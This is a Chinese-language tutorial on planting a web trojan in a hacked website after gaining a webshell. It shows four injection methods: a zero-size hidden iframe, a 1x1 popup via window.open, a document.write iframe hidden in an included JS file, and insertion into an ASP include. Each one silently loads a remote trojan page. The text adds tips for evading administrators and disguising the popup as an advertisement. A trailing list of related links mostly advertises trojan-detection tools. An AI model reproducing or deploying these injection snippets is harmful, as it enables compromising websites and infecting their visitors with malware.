方法一:
一般在你入侵了一个站拿到了webshell的时候,没有拿到就不要谈挂马拉。最常见的 挂站代码如下 :
<html>
<iframe src= http://www.yuzhiguo.com width="0" height="0" frameborder="0">
</iframe>
</html>
把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向http://www.yuzhiguo.com。而http://www.yuzhiguo.com 也就是我门的网页木马了(可以换成自己的页面),那width="0" height="0"又是什么意思呢?width就是宽而height自然就是高了。我们把它设置为0也就是不显示了,对方也就看不见我们的这个页面,木马也就会被下载到本地。
方法二:
<script language=javascript>
window.open(" http://www.yuzhiguo.com ","","toolbar=no,location=no,
directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
打开网站的同时也就打开了我们的是不是比上面的那个隐蔽了些。如果粗心的管理员在搜索了iframe没结果后,放弃了检查这个页面,那你不是拣了大便宜了!这里我把width和height的值设置为1了,不错!就是1,因为我在用0测试了N次后,发现打开页面弹出我们的木马页是满屏显示的
其实我们还可以简单装饰一下那个页面的,让弹出一个我们伪造的广告,达到欺骗的效果!至于怎么伪装就看你自己发挥了。还有几种方法在这里就不一一列举了,flash木马也很厉害的哦。
方法三:
还有一点就是比较隐蔽的那就是使用js文件
主页只有一个<script language=javascript src=./inc/bbsxp.js></script>
js内容可以为documnet.write("" "" 中可为任何html代码..)
document.write("<iframe height=0 width=0 src=' http://www.yuzhiguo.com ' name=hiddenframe></iframe>")
此招相当隐蔽.......实战就不用说了..............
方法四:
代码加进包含文件<!--#include file="conn.asp"-->
分享到:
相关推荐
详解网站挂马方法/教会你如何渗透网站挂马,抓肉鸡等
网站挂马清除工具 可以迅速的检查出网站的恶意代码。
一种很好的网站挂马查看工具,有助于你知道网站是否被入侵过
SEO及网站挂马
网站挂马扫描分析器MScaner v0.3 仅供参考。
MHTSoft推出了“门户通网站挂马检测器”,从此不再让您担忧!您只需轻按键盘、轻点鼠标,就可以实现对整个目录(或网站)的检测易语言: 该软件是由易语言(一种编程语言)写的,部分杀毒可能会认为是病毒,请放心...
asp网站挂马检测 检测网站是否被挂马 一个ASP写的程序
网站挂马扫描器
专家教你如何进行网站挂马检测与清除!让你不再害怕被挂马!
网站挂马 看了就懂了 对于电脑懂的都能看
网站挂马扫描器,是否还为你担心的网站有病毒,就用她(网站挂马扫描器)检查下吧
网站挂马扫描器(MScaner)是一款自动化扫描分析网站是否被挂马的工具。MScaner可对网站进行自动化扫描分析,探测是否被挂马,所挂网页木马利用何种漏洞。 主要功能: * 自动化的网站挂马检测
快速便捷分析挂马网站,你的分析助手。使用方便易懂。
当你的网站被加了代码之后,你可以手动清除,如果你的每个html、htm、asp、php、xml页面都被加了同一句script代码,那你要手动清到什么时候去?(我自己中过那个毒...很头疼,dweamweaver打开都报错的那种,因为它的...
php 站的木马文件,有空可以研究下。还行
一个小巧的工具,用来检查网站文件或者网络文件是否被添加了危险代码。
文件操作,数据库操作,开进程执行 上传,转移位置,最后修改时间,执行程序,读写文件,SQL数据库操作 查看数据库结构 服务器上的操作基本都能实现
收集到的人家挂马文件,有空可以研究下,挺不错的